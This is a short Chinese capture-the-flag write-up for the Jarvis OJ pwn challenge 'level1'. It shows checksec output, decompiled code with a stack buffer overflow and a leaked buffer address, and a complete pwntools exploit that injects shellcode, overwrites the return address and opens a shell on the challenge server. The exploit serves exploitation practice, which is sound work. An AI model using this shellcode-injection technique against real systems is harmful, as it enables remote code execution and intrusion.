level1

0x01 寻找漏洞

xfgg@ubuntu:~/Documents$ file level1.80eacdcd51aca92af7749d96efad7fb5 
level1.80eacdcd51aca92af7749d96efad7fb5: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-, for GNU/Linux 2.6.32, BuildID[sha1]=7d479bd8046d018bbb3829ab97f6196c0238b344, not stripped
xfgg@ubuntu:~/Documents$ checksec level1.80eacdcd51aca92af7749d96efad7fb5
[*] '/home/xfgg/Documents/level1.80eacdcd51aca92af7749d96efad7fb5'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
    RWX:      Has RWX segments
什么保护都没开！！！

ida分析

int __cdecl main(int argc, const char **argv, const char **envp)
{
  vulnerable_function();
  write(1, "Hello, World!\n", 0xEu);
  return 0;
}

ssize_t vulnerable_function()
{
  char buf; // [esp+0h] [ebp-88h]

  printf("What's this:%p?\n", &buf);
  return read(0, &buf, 0x100u);
}

0x02 思路分析

1 2	一开始以为是write函数无libc泄露发现没有system做不下去了没开保护写入shellcode

exp

from pwn import * 
p=remote("pwn2.jarvisoj.com","9877")
shellcode_addr=p.recvuntil('?',drop=True)
shellcode_addr=int(shellcode_addr[12:],16)
pad=0x88
shellcode=asm(shellcraft.sh())
payload=shellcode.ljust(pad,'A')+"BBBB"+p32(shellcode_addr)
p.sendline(payload)
p.interactive();